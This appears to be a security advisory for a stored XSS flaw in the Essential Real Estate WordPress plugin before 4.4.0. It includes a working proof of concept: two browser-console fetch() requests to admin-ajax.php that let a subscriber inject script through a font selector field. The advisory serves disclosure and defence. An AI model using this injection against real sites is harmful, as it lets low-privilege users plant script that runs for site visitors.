Essential Real Estate < 4.4.0 - Subscriber+ Stored XSS

2023-12-1800:00:00

Krzysztof Zając (CERT PL)

real estate

subscriber

stored xss

font manipulation

security exploit

vulnerable site

AI Score

5.8

Confidence

High

EPSS

Percentile

14.0%

JSON

Description The plugin does not apply proper capability checks on its AJAX actions, which among other things, allow attackers with a subscriber account to conduct Stored XSS attacks.

1. Login with a subscriber account, and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. Paste the following in your browser's console:
```
fetch("/wp-admin/admin-ajax.php?action=gsf_change_font", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_nonce=${GSF_META_DATA['nonce']}&font_data[kind]=custom&font_data[selector]=ppppp`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})
```
3. And then the following:
```
fetch("/wp-admin/admin-ajax.php?action=gsf_save_active_font", {"headers": {"content-type": "application/x-www-form-urlencoded",},"body": `_nonce=${GSF_META_DATA['nonce']}&font[0][kind]=custom&font[0][selector]=");alert(1);//`,"method": "POST",}).then((response) => {return response.text();    }).then((data) => {console.log(data);})
```
4. Visit the site to witness our malicious script running, triggering an alert box.